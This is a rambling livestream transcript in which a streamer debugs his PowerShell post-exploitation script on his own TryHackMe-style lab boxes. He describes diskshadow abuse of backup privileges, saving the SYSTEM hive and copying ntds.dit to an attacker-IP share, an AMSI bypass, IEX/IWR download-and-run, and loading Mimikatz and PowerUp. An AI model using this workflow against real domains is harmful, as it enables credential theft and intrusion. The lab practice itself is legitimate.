We're not getting all this whenever I run it. You notice that? I'm just getting just an arrow and that's it. So it's not actually doing what it's supposed to do. It's not actually echoing all of this into there now, is it? So I'm wondering, let's do this for every single one. No, we don't want to actually write that host like that. I'm wondering if maybe we should, let's see here, because it's not actually echoing the stuff into there. Now what is it? All this is not being echoed like right here. Into script.txt, because if it's being echoed in there but it's not running it. How about that? So it's all going into there, it's just not running that. Hey, thanks a lot for the follow. Nonsense. How you doing? Usually the streams are much better than this. Usually I actually know what I'm doing on the stream. Okay, so it's not actually running any of that. If I scroll up here, we see that's just an arrow. We shouldn't see that. We should actually see like a disk shadow copy. So if we run our disk shadow copy, right? If we run this like right here, then it should just be an arrow and then that's it. Because it should be running this whole thing, right? So now I'm wondering why it's running like that. Second their handle. So why isn't it running it? Is it putting like a space at the top or something weird like that? No, it's not. Okay. Is it... I mean, it is weird. This stuff is weird, so... Powershell. So you never frickin' know. I really don't think that this is the problem. But then again, PowerShell is very picky sometimes. Please don't kick me out again also. I'm using OSINT to find all the InfoSec channels I can check out. Oh, dude, just so you know, I don't know if you know of InfoSec streams on GitHub, but that'll actually show you a lot of them also. I cannot. Why? Okay, thank you for not kicking me out at least this time. And if we scroll up, I can guarantee, yep, we got to save that thing again. Let's go ahead and get rid of this. I want to do something like that, so there's a space between those two. You never know. I don't see why that's not going to do anything. I don't see why it would. Okay. Yep, infosec streams GitHub. So if I go to here, infosec streams GitHub, and the .io one, infosec streams GitHub.io, right there. All these guys, and it'll also show who's online and everything like that at that time, streaming, and who has YouTube channels and all that good stuff. So nope, that wasn't it, like right there, because it's still doing the same thing up there. Okay. Why though? Why do you hate me? It's all going to script.txt. Script.txt is being ran. It is running and everything like that. So make sure that script.txt is still good. Okay, yep. So everything is going in there. It's all being ran. It's all good. And it should be giving us this like right here, but it's not. I wonder if I actually need to put it into, I don't see why I would. That really makes no sense to me. That's just usually a place to actually write. But I'll try anything like right now. And we'll go ahead and we'll run at this shadow. Go ahead and run this. Okay, so it's still not running. Why aren't you running? Because the guy has the privileges to be able to do it. So why are you not? And you know what? This is the same problem I had on another one that I did whenever I was trying to run a script. This is the same problem I had on another one. On this guy right here. And I thought I got it all figured out. But obviously not. Because I got rid of the X's, then all of a sudden it ran. Because I was trying to run it with the X's at the end. You know, if I actually just took this whole script and just got rid of the questions, let's try something real quick. Let's go ahead and grab that. Just that whole thing right there, right? And this is still going to see Windows temp though. We just got to get rid of that probably right there. So let's go ahead and throw that into my script that I already have. Which I'm pretty sure is the same thing that I already have on here, but hey, you know what? Is that like right there? Maybe the enters have something to do with it. Even though they don't, but still. This is in Python. System.back, and we'll do, we're not going to cd in anywhere. Clean this up like a little bit. Okay, let's see if that does anything for us. Let's see if that, I don't see why it would, because that's literally what I already copied and pasted, but let's see. You never, ever, ever know, right? I'm only going to spend about another 15-20 minutes on this guy and then take a break for the night. Okay, at least it did a little bit more that time, right? I mean, at least it went through it, but it still cannot get, it's still doing that. Like, right. Oh, man. I want to see something real quick. I want to see if I RDP on the box, if that exact script works on it. Let's see something. Let's do an IEX-IWR and let's actually download that script. Oh, I'm going to have to actually go out on here and actually do it. Okay. Yeah, look at that Internet Explorer. Look at that thing working good, huh? It's going to ask me the same thing again. Nope, it didn't. Okay. So, I want to see something. We're doing backup operating right now, right? It's going to go to raw. I want to see something. Okay. Invoke backup. Attacker IP is going to be 192.168.0.29, I believe it was, right? Yep. Okay, so it's not working on here either. Now let's just see if it's this system. Oh, you guys can't even see that. My fault, my fault, my fault. Let me, there we go. Alright, so I just tried on here also, on this machine, just straight up on PowerShell. And it's also not working on here either. Okay. It got system not back though, but did not get the NCDS. And that's what we really care about, is that NCDS now, isn't it? Let's see if it's still not running that properly. I want to see now if it's just this machine. Go ahead and go to invoke. Just regular straight up invoke, and we'll see if that works. What time is it over here? It is 10:12 p.m. Let's try it on regular invoke and see if maybe I did something in invoke 2 where it's just not allowed to do that or something. I don't know. Put in a GPO. I don't know. I don't know what I do by my own boxes. I don't actually know what the hell I'm doing here. But since we are just on stream, oh no, it is being recorded. I was about to say. I can do invoke 3 like real quick. Also, in case you guys were wondering, invoke 3 is also on Try Hack Me now. So invoke 2 and 3, you can actually do without. We'll go to manage rooms, I believe it is. Yep, you can actually do them on here. There's no RDP in invoke 2 and invoke 3. So if you guys wanted to go to it, it is tryhackme.com/junior invoke 3. So if you guys want to try that one out, more realistic room. DZ64 was the first one to complete it, I believe. So if we go to maybe tasks, design, users, DZ64 definitely completed it. Oh wait, let's go to share room. We'll check your room out. Maybe it's in here. Yep, DZ64 completed it, and he got the 80 points for it. So he dropped in that root.txt. But and then he did a little stream about it. But I'll drop this into the Twitch chat so you guys can if you guys want to try it out. No, if you don't get it, DM me out Discord. Look at it. So pretty much DZ. Let's see if it works on the other machine. No, nobody actually knows what the hell they're ever doing. At least I know I don't ever know what I'm doing. Okay. And also invoke 2, which DZ, have you tried invoke 2 yet? I believe it's actually just invoke 2, in all honesty, but we'll go ahead and we'll back up just to make sure. I think that invoke 2 is more up DZ's alley for the exploitation portion of it. And if you guys haven't, if you guys don't know who DZ is, DZ64 there, he is extremely intelligent, and I guess my shout out thing doesn't even work anymore. So, but check him out. I don't think any of my Twitch stuff is actually connected anymore. The name is also play on everyone using secondary. But my I don't think any of my stuff is actually going through anymore and actually doing it correctly. What am I trying to do here? Oh yeah, I'm trying to go to here, get the IP address. I'll open up root.txt over here so you guys can just input it all. Okay, 192.168.0.36. Okay, let's go ahead and try it over here first because I believe I can control V in here. I can. Cool. So let's go ahead and grab that thing first. Go over here and we'll grab the. Let me just grab this whole thing, huh? IXIWR, this guy right here, huh? So yeah, let's do that. Scroll up like a little bit. Let's see if it works for this guy over here. Backup operators. If it does over here, and it doesn't in the other spot, then I'm feeling pretty good about it still. Okay. Don't worry, we can fix that. We're not going to let that hold us back, right? Alright, let's go ahead and hop into my notes here. I do too much crap on my own stuff. Where are you? Actually, I can just do this right here, huh? Cat, scripts, AMSI bypass. There we go. And we'll throw that over in here. Okay, there we go. All right. And we'll do our invoke everything with our M. Attacker IP is 192.168.0.29 on port 4444. It's downloading everything. Create a new user. Oh, what is wrong now? So it's not making, so it's not running that disk shadow properly, is it? I'm wondering if it's almost going too fast for it. So like a way to like slow it down. Slow down. Let's go ahead and echo all this into it. Oh no, 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 no. What's up, B7H3? How you doing? Oh no. Man, a lot of people said no. Geez, sorry. Jeez Louise. I don't have the X's in here, but I noticed with the other one. Now let's try something. I want to try something real quick. I want to try. Actually, I gotta get back over here onto the web, onto the interwebs over here, right? Is that what these things are called? I actually want to raw. Let's see if this works. It should be. We should get the same exact thing. Invoke backup. And we do get synced, I think. Why are you doing that? I feel like DZ, I feel like it's almost running too fast. Slow down. But script.txt has it all in there. But this shadow is not running it. Is the slash another way? Yeah, I didn't think so. The script.txt has everything that needs in it. Yeah, Twitch it has been slowing down a lot. In all honesty, it really has. We should get this over here. Whenever we run that disk shadow / script.txt. We should get that like right there. Why we're not, I don't know. It's typing it out. I mean, it's all typed out correctly and everything like that. We can try to throw the X's in at the end there, but I was not getting anything with that before. I remember whenever I did this. So let's go ahead and go over here. We'll do a quick notepad. Delete script.txt, notepad, script.txt. Yes, I want to create a new file. That's why I said to do that. Save that. This shadow. Okay, now it's only giving me just one of them. Okay, because it's saying that on is not a thing like that now, is it? Because on X is not real. But at least it gave me something that time. So that's how it works. But if I put the script.txt on there, it does not work. Why is... Lack of pay? Lack of pay for what? If you expect to get paid on Twitch just streaming, you're like a 0.01%. So, can you open Notepad from here? That's not even a joke. That was not even a joke right there, so you know. Did it actually open up Notepad over here? No, it did not. Okay. But if I were to copy... this notepad, so if I did a notepad over here, whoops, that's not what I wanted. If I were to put it over there, is that going to work again? So if it's already, so what is happening between it's saving with Echo and saving with Notepad? What is the difference here? Oh, this is because this one does actually have we can actually just copy on this one. That's why. No, even when RM, that's what I'm talking about. Opening up Notepad. What is happening that's different between the two? Am I going to have to do something like... Save that. Can I do a wget? 0.29. Okay. So at least it's trying this time, but it's not running anything else now, is it? And everything is in there. That is strange. So it's not... Well, why aren't you getting the N? Let's see if it gets those three. For some odd reason. No. Yeah, I'm trying to set it to on, but for some reason you can't read your own file. Right with the script and look at the file in Notepad. What do you mean? Right with my script and look at the file in Notepad? What do you mean? That was pulled straight off my script. So the script is right here. So you're saying, okay, I see what you're saying. I see. I'm an asshole. Okay. So you're saying just echo it into there. So it looks the exact same. Ready? So we'll do it on invoke. Just already know that one. That's the, we just both talk about that like right there. So you're saying do that. and then do a type script.txt, right? There's that. Okay. You know what? Let's actually do. Oh man, I should not have done that. I should name it like script 1. Now let's try. And that doesn't go through. Notepad script.txt, and there it is. Just make sure there's like no spaces anywhere. Let's try that. So got rid of all the spaces. Nope. What are you doing? Windows. Nothing. It says parameter 1, parameter 2, parameter 3. Let's try something like this. It says parameter 1, right? Try that like right there, see what happens. Nope, okay. I just want to see if we saw some stuff start to come through, but nope. Okay. Let's try like that. See if we start seeing anything come through. We should at least be able to see the set verbos though. So that still doesn't make any sense. Nope. Okay. Why did we do script? Okay. I have no clue. No clue what to do here. This was the same thing that was happening whenever I did on ship, and then all of a sudden it just worked. And I was like, okay, there we go, it's good. Obviously, these days I think it's happening again. You never know. It's Windows. I know everyone's like, yeah, that's not going to do anything. I know it's not, okay? But you never know. God damn it. Open up the wrong damn one. That's obviously not going to work right there now, is it? Yeah. Well, offset needs to, instead of try hard, need to just, you know, try smarter. Trying hard is not going to do anything. You're already trying as hard as you can. I never understood that. Like from offset, try harder. That literally makes no sense. You're already trying. Ah. Let me see if this is how I have it in my notes, like right here, right? And if I go and do that on the box now, it tells me that I can't do anything with X. Puts an X at the end of everything, right? So let's go ahead and do a. Go and do that, right? If we save that like right there, we do the same that thing as wget, right? Script.txt. Let me run this shadow /s. for script.txt. What the fuck? Okay. So okay. What is happening now? But now backup is like, yeah, I don't know what the hell backup X is. But everything else ran with an X at the end of it, now didn't it? So should we just get rid of that part? And let's see what happens. Get rid of the backup X. Let's see if it does everything and goes through for some odd reason. And backup was not commanded. Writer's not specified backup complete. Probably because E is already in use, huh? So what the hell is going on here? Okay. Now let's try to put that in my script. That exact thing. Right? We'll echo all those into my script. And I'm pretty sure I already tried to do this, but we're going to go ahead and Control C that. And we're just going to put an echo in front of everything. And we're just going to do this right here. And we're going to do a echo that, right? Okay. Now from here we're going to do, and we want to put all that into script.txt, right? That was stupid of me. I should have did it like this. There we go. Now copy that one. Okay. Now let's see if that works, which it most likely will not. Let's go ahead and do this guy like right here, and we'll go ahead and we'll run that guy like right there, and let's see if it does it or if it gives me the error again. Most likely going to give me an error again, I'm thinking. What the fuck? That time, did it do it that time? Let me go all the way up actually. Okay, so mind blown. I don't know, but that time it did it. We have the SMB server up and running, and it came back to us. So if we do an LSTAC LA, we should have that system.back in here. No, we don't have it yet. It's still saving it, huh? It even called back to us and everything. I don't know. I don't know. Is it froze? Did I have it ask a question after system.back? No. It's probably just going to take a minute because system.back's pretty big, huh? Okay, sure. We'll just leave it like that then. Sure. Whatever this thing says. Right, so it looks like SE backup privilege now works. As soon as this system.back is saved. We'll see if it actually ever saves. Made the robocopy and everything like that. System.back's taking a sweet time to come back to us now, isn't it? Looks like it already tried to come back to us also. So that's what I'm kind of confused about now. And I'm wondering if it has to do with well, it still says it, probably because it just doesn't do anything after that, huh? So we should probably do a copy system.back into $attacker IP /share, and then copy ntds.dit, right, into $attacker IP/share. I do it with, I think I did it with capital S, didn't I? What did I do it with? We do have to add that, correct. Nope, lowercase. Okay, let's copy that. Stop this guy. Oh, thanks a lot. Start that back up. Go ahead and head all the way back up the top up here. Do this again. All the way back up again. Whee! There we go. And we will do this again. What's funny is I already tried to do that part like right there. That's what's kind of funny. I already tried to do that. Okay. See if it tries to send it back to us. It's doing that probably right here. Registry save. And that takes... Alright. If I'm staying here, I'm going to get annoyed with it, so I'm going to take a quick 5-minute break, and we will see if it decides to do something there. So 5-minute break, we'll walk away. Let's see if it decides to do something like right there, and we'll go from there. And I am going to also go to bed soon too, so if it does or does not, that's going to probably be about it for me with this guy like right here so far, with this script at least. But we'll go from there. Alright, it should not take that long. So WinRM does not seem to like to save registry like that. If I go back to invoke and I run that same exact thing, it will most likely, I think, it'll work. Let's try it. Let's see if that works. Let's see if it saves it. Probably because it already exists, huh? Okay, because it already exists, it's trying to ask me a question. I wonder if we actually type in yes, if it'll actually work. So obviously, this wouldn't. That's why. Okay. So, I wonder if we could do like attack force. Could we copy, reg save? Could we do like attack force after this? If we take that command, and we go over to here, and we do that, and then we say attack force, will that work? How do we overwrite something if it's already written? Or do we just delete system.back? Oh, let's go ahead and delete it first in the script and then rerun it. Let's try that like right there. Won't they be impressed I am a genius? System.back, just in case it's already there. Now, okay, that's why it's not going anywhere. Okay. WinRM, you really need to ask questions. I wish they made it where now let's see if it's going to do it. It's going to delete it first. Even if it doesn't exist, it doesn't really matter. Still try to delete it. Oh, I could check it. Yeah, that's a good idea. Check if that exists, and then if it exists, then delete it. The operation complete successfully. So we have system.back. And we have ntds.dit. So now we should. Oh, nope, I can't do it because DZ64 has already. He hasn't done this one yet. So okay, that does work now. So we'll do system.back. And we will write an if statement because that's what Christy wants. So we'll say if how do I want to do this? If can I do like a dir? No, what we could do? We could do this. $, dir, $sys, dir equals dir system.back. Can we do that like right there? Can we just do a dir system.back on Windows? No, we just do a dir, huh? Okay, we can do that. But how will we tell it that it exists? Okay, so sister equals dir system.back. So we say if $sister equals, I don't even know what. Oh, I got system.back. We could just do that. We could just say, hey, if it equals system.back, then delete it. Could do that like right there, huh? Then delete system.back. Else do that. If it has that, go ahead and delete it and run the rest of this crap, huh? So go ahead and do that. So we'll say just delete it, else do that. Doesn't have it, then don't delete it. Contains, it does not like that. So we try to use contains above, and I don't think contains is what we all think it is with Windows. Because I was even reading about it, and it even said like it's not what you think it is. It's not like. Is that supposed to be there? Which one did that one go to? What do you go to? Okay, what do you go to? You go there. You go there. What do you go to? Right there. I don't think you're supposed to exist, big guy. Let's see if that works. Oh, no, definitely missing a closing bracket. It's definitely supposed to be there. Well, whoopsie daisy. Sorry. Here, you can just go there. I don't know what you're doing there, but yeah, go for it, big guy. I don't know which one you're talking to, but go for it. Okay, cool. Thank you. You want to know what you're talking to? You're talking to him like right there, aren't you? Whatever. That's fine. Okay, now let's go ahead. Yeah, it doesn't like contains doesn't correlate to what contains means. It's really, really weird. I was even reading about it, and that's literally what it said to us. Like, contains is not. I'm like, okay, so why is it called contains? Maybe we should call it something else, like, doesn't correlate to other shit. The server system.back is not recognized command line function or script file. Okay, so if sys dir equals, oh, well, no shit, we gotta actually do a dir system.back. No, if sys dir equals that. Okay, so sys dir is that. Sys dir system.back. If let's try contains this time. You never know. Yeah, I hate that, huh? You know what? I don't care about the fucking shared boxes. What keyboard? Magic Eagle, Have It Game Series. Nothing too special. I think the mouse actually costs more than the keyboard. My wife bought me a Logitech G Series mouse, the G502, so that was pretty sweet. All right, there's this map back. So how do we check? Let's see if check. Well, I guess Google can work with that, huh? Check if file exists. If so, delete PowerShell. Oh, thank you. File name. If test path. Remove item. Okay, cool. So if test path. So we need file name. So sister equals. I guess we could just say system.back, huh? And then from down here, because if it's not in that same folder, it can overwrite it. So if test path oopsie daisy. Is system.back, right? Nope. If test pass is $, sysdir, then do that, else do the other thing. Right? Move item, okay. I guess just delete works just as well. Okay. Let's try that. System not back not recognized. I hate you. Maybe I need to put in the full path. So maybe I should do like a sister equals pwd. No, because that's not going to do anything. I know what's happening. It's just that system.back doesn't actually exist. That's all. I don't know exactly what's happening like right now. It's just saying that that name isn't anything to PowerShell. It's trying to actually run that command like right there. Okay, so that's having deleted, I think. But now it's running this shit again. See? It's running, it's doing that again. So it literally just worked, and now it's doing that crap again where it can't figure out the script. Oh my god. It's doing it again, isn't it? Yep. It's doing this crap again where it can't figure out the script again. So the script isn't copied onto the machine. Even though it did this, I don't know how many times now. Now it can't do it again. I hate you, Windows. Oh my god. System not back at least get deleted? No, because it never got through. Because you can never save it, huh? Oh, well, it just saved it. So, I guess it did delete it. Because it doesn't do that till 1. It doesn't do that till like right here, huh? So, I mean, at least it deleted it. It resaved it. Oh man. You just have to run it 47 times and it'll work, that's all. It's a really good script. Why do you hate me, Windows? So it's not actually saying that delete it now, is it? Oh, you want to know why we're... No, we're really stuck again because this is probably right here, but it should delete it at least. You know what? If it's a shared box, someone else could have to figure it out. That their system.bat got deleted. They should have left it on there. There we go. Now what did I do? Oh, probably because I have this like right here, huh? Yeah. There's not going to be anything else anymore, is there? Now it's not going to be able to copy it over now, is it? Operation complete successfully. I don't believe you because that file does have something. See if it worked. Easy, look away. Be patient. Shall write. So it should be overwriting that script.txt, so just in case it's not overwriting it. We'll do this again. It's gonna overwrite over here and this thing's gonna be super confused. But what the hell? It's worked. It worked, okay. You know, it didn't really show me anything, but it definitely worked. And it saved it. It did everything. Let's see if it works this time. Okay, it worked. It did it. It's not running any of this stuff up here, but it sure as hell did it. I don't know. I wonder if it's just getting it because this is already in there. Or if I can even do that. Or if that was the worst idea I've ever had. I wonder if it's just getting it because this stuff's already in there. It doesn't look like it's actually doing what it's supposed to do. Or else we would have a whole bunch of stuff up here. Go ahead and delete it on the actual box itself, huh? So I can actually see what's happening. Okay, so it's in the other one. Oh shit. Hey, thanks a lot, man. Thank you very much, anonymous tipster. Thank you very much. Whoever's gifted that out. Thank you. Probably not allowed to delete half the crap that's in there. And it doesn't look like I am. Can I run you? You're already running as administrator, aren't you? Can't right click on this one, I forgot. Yeah, DZ, can't right click on this one for invoke. So you know. Because it already has drive E into there. How to remove drive? I use E delete. Okay, let's try that. Am I the wrong one again? Seems like to do that, huh? Alright, so that one doesn't exist. And if I go to this one over here, I'm in E. How does it not exist? Remove PS drive. Let's try that. Network name cannot be found. I feel like you're lying to me. Like hardcore. Okay, so remove PS drive. Can I find drive? It's right there. So is it a slash delete? No, because it's saying the network name cannot be found, or else it would have said that there was a problem up here. Yeah. That's not it. Just saying network name cannot be found. Somehow E doesn't exist, although it does exist. Now that's a good idea. I'm literally in it like right now. Somehow it doesn't exist. I hate you, Windows. What if we do this? What if we just open this up, this PC? Does the E drive exist? It 100% exists right here. Format it. Properties. How do I remove you? Go away. You could just format it all. We could, yeah, sure, okay. Disk is write protected. Of course you are. We'll get rid of write protection then. Full control. Full control over it, but for some reason I can't do anything with it. Just let me do what I want to do. This is all just to check if this is even going to work, which it probably won't. That's the worst part about this whole thing, is that it probably won't even work. Windows key and X. Okay, go where now? Run. Oh, okay. You want me to go run, so command prompt. This part. Okay. List disk. Okay. And it only has one disk on there. That's great. Because this thing's looking at, for some reason the E drive supposedly does not exist. It should be a physical disk because we're making an alias of the C drive into the E drive, is what we're technically doing here. That's good, okay. So I just can't do anything with this, huh? Thank you so much, Windows. You guys are fucking amazing. You guys are the best. I can't even change my own permissions on this thing. What's the point? Move physical disk command that? Really? Okay, let's try that. Remove physical disk. Storage pool, physical disk. E drive. Get physical disk. Oh. Get PS drive. Okay, there it is. There's the E drive like right there. That's what we want to remove, right? So we're just going to say, you know what, let's try this. Because it doesn't have the little things right there. Yeah, well, that's stupid of me. Okay, so remove PS drive. Tac name E. Okay. Well, we removed it, but it's still there. Remove PS drive. Literal name? Do we have a literal name in there? No. PS provider? File system? No, because that's going to remove that. Scope? No, okay. Force? Yeah. Tac name E. We'll force it. Yeah, that's not going to work. What the hell was I thinking? That was stupid of me, huh? To think that. That was actually going to work like right there. That was a dumb idea, Ryan. Alright. Just about done messing around with all this crap. Can we still CD into it? Or is this, that's not invoke. Okay, never mind. Let's go to invoke 2. Well, you know, if invoke isn't working, then we could just run it on invoke const. So let's go ahead and do an ipconfig. 192.168.036. Let's go ahead and put our arm into there. If that one doesn't have it, then we can actually see. Got 36 right. That was good. Is that gonna work? Is that right? No, it's not right. Is that right? That might not be right either. I might have been right the first time. Or why don't I just do the IEXIWR, huh? Why don't I just run the script, huh? There. Oh, WinRM isn't even open on this thing. Never mind. Okay, let's see if it makes the E drive. Because if it's not on here, then we could just test this one like right here. I should have thought of that 35 minutes ago. Because it's never actually been able to run on this guy yet. So then we'll see if it's working. Most likely not, but we'll give it a good try. Give it that old college try. Alright, yep, system cannot find a specified path. Good, that's what I like to see. But it can if I run if I actually have it to where, yeah, you actually can't run. It can run if I have it to where it's not even giving like an error. It just doesn't like this. That's all. I wonder if I put that. Let's try this. I got an idea. I have a million ideas. Here we go. Let's go to GitHub. Am I even signed in? No, I'm not signed in on this one. Okay, let's go to GitHub. And we'll go in and invoke everything. And what we're going to do is we're going to go ahead and we're going to create a new file. All right. Name your file. We're just going to call it script.txt. And all we're going to do is we're just going to try to copy and paste everything into there and see if we can go back out to the internet, pull it down, and do it like that. Let's see if that works. No, that's a kind of, I think, a shady way of doing it, but I don't know. So all we're going to do is that, right? We'll put that into GitHub. We'll get rid of all these echoes. We'll get rid of all of this crap. We'll get rid of all of this crap. This might be a little bit faster. And we'll save it. We'll commit new file. And let's see if that actually works. So we got our script.txt here, right? We go to raw. And we're just going to try to download it now from the script. And then put it into script.txt. Let's try that like right there. So if we take my script now, we delete this whole thing. And we do a wget. Use basic parsing. And we throw that in there. Tag out file will be script.txt. Let's see if that works. We'll save that like right there. And let's go ahead and hop back over to this machine. And we'll try to run it again and we'll see if that works. Please work. I am a frickin' genius. Yes. Okay. This one won't allow me to set it back to myself because I have it blocked under policies or whatever, just to make the box that much more of a pain in the ass for DZ64. But I did it. Thank you. Okay, cool. So that works. So now I should be able to CD into E. And yep, that does work. Freaking sweet, yo. Age of Music, thank you for that remove physical disc though. That might come in handy later on down the road for me. Freaking sweet. So we'll do a little right host, downloading. Let's go. Alright, cool. So that works like right there. So all we do is just go reach back out to GitHub and say, hey, go ahead and download this. Now something else I want to change is this amp bit. I think these should all be equal. 32-bit. Not contained because that was a problem up top, right? And we're just going to try to run it like real quick. And we also want to do if user or equals, right? DNS admins. I think we want to do it like that. Not contains, because the contains one, like I said, is not what you think contains means, which you would think, you know, this is a very big, hard thing to do, but obviously it is. Contains is not a word that the scene likes. So we're going to change all these to equals. And let's see if this domain admin one now works now. Let's go ahead and throw it back over on this machine over here. Because we are an admin, so it should say that we are a domain admin. Re-download it. It did not like that at all. So I guess contains was the right thing to use. I don't fucking know. I don't know where it needs contains and where it doesn't. Save that. We're just going to try that again. We'll do it one at a time. Probably should not have done them all at the same time. But I'm an asshole. That's what I do. Okay. Alright. What I want to see now is, okay, so there's those ones. Where's all my privileges? I know I have more privileges than just that, like. Have I just not put them in here? Huh. It's weird. I just never put them in here. Can always do a shadow copy one too. But I think that's what I'm going to do for tonight. I know there's a lot more privileges than just that. I don't know why I only have this one in here and that's it. Because I should have all the other ones I've ever done too in there. Oh, you know why? Because it's sitting like right here, huh? Yep, always install elevated like right here, even though that should be over in privileges. Whatever, that's okay. Alright. Always install elevated. We could try this like right here. See if it's on there, even though I know that that was not on the machine. That one doesn't, well, it didn't work for me. But we could always do, let's go ahead and test this guy real quick, make sure that it's still working actually. I want to see if it does say that I'm an administrator. You know, services and everything. Let's see if user with administrators group. I should see, okay, is an admin. Okay, so that still works. Alright, cool. Okay, persistence. Okay, grabbing invoke mimikatz. Okay. System is 64-bit. Okay, so it still knows that 64-bit system and everything like that. With it's saying, well, you know what I should do? I should do this whole thing right here and then just say and as if user equals that and bit contains, because I don't know if this is working or not. 64-bit. Should upload a new script if you haven't. I have not uploaded this one yet to GitHub. I was going to wait till I actually, you know, did a lot more with it. But just so you know, I'm already an administrator on, because I see you put that little LOL in there. I'm already an administrator on this machine. These aren't going to work for invoke or invoke 2 with the permissions you come in as. These are just my test boxes like right now. I know what you're trying to do. She's like, I'll just run this and I got it worked. Run enum.ad.sh and run this and be like, oh, done. All finished. Because now we'll see if it's actually going to run that. Okay, so it still ran it. Okay, cool. So it looked at it and said, hey, yes, it is that, and it contains 64-bit. Let's go ahead and change this to a 32-bit and see if it runs this time. But yeah, I have not put this one on GitHub yet. I also don't think it's, I mean, I could throw it on there. I don't know, DZ, what do you think? It's not nearly close to ready yet, I feel like. I feel like this is going to be like a couple day stream thing. Oh, it worked, because now it's not saying, okay, cool, it's saying, hey, it's a 64-bit system, and we can't do it. Okay, cool. So that bit thing does work like right there. All right, cool. Even though that doesn't matter for this one like right here, but now I know that that does work for these guys up here. All right, awesome, easy day. So let's go ahead and, yeah, I can throw this onto GitHub like real quick. It's not anywhere near finished, obviously. Now to run it, you obviously saw it's invoke everything with RM, attack attacker IP, and then attack outport. Okay, so whatever your attacker IP is, and then your outport that you're going to be using. Okay, so let me go ahead and grab. Oh, do I still have it where? I should probably at the end here. Okay, so there's all that, right? And then it does say running power up somewhere also. Yeah. Okay, it just says putting power up into memory. Where else does it say that? Okay, so it just has those two like right there. Okay, cool. I could have swore that says somewhere else too. Maybe it just says putting power up into memory. Okay, then we'll come down to the bottom. Yeah, invoke all checks. Because we're not running invoke all checks like right there. So we'll go ahead and we'll cut that. Okay. I just figured, you know, you're going to be like, ho. Like as soon as I put it on there, hey, I got invoke 2 and 3 done. Jesus. What's it again? Invoke all checks. I mean, hey, you know, I guess if I wrote the script, then the script's out there. Go for it. That's what I would do. Deezy actually did an amazing job at what was it? Invoke 3. I thought he did really good. If you guys want a box, I think they liked it. He said he liked it. That was also on a stream at the time that he said it, so I don't know. But he said he liked it. But yeah, if you guys want what I think was fun box, Invoke 2 and Invoke 3, you can both do on Try-Hack-Me. Invoke 1, you can't really do it because it you have to RDP into it. You could try it. It did work in the beginning, but there's just not enough what's called resources put toward it yet. So but yeah, if you actually just do the junior like right here, so if you actually just do, so if I share the room, right, which I already shared them, you go to share room, tryhackme.com junior, if you use invoke 2 or invoke 3 or just invoke, it'll bring you there. So if you type this into your URL, it'll actually bring you there. And then there it is. Hate Handles is the first one to do invoke. He did one that was still easily doable on Try-Hack-Me. And downloadable and everything. Okay, so I think that's going to be it for tonight. We're going to be done for like right now. That'll be it. I'm going to go ahead and throw this onto GitHub like real quick. I know Control A would have been much easier, I understand. Let's go back to invoke care 1, and we'll go ahead and go and invoke everything. And we will code, nope, add, we'll just create a new file, whatever. There we go. And we will call this invoke everything with RM. Deezy's going to turn into like a C shell program or something. Like, what the hell is this? I don't know what this is. .ps1. There we go. And we'll go ahead and we'll commit that new file. He's going to turn into like an executable that like bypasses everything. Jeez. So, alright, cool. You guys have a good one. Have a good night. I will talk to you all later. Let's go ahead and find somebody else that is streaming. Anyone on InfoSec? Hate Handles on. There we go. Alright, cool. So we can go drop you guys over to Hate Handles. He does a lot of Windows stuff. So I will talk to you all later. Have a good one. Good night, everybody.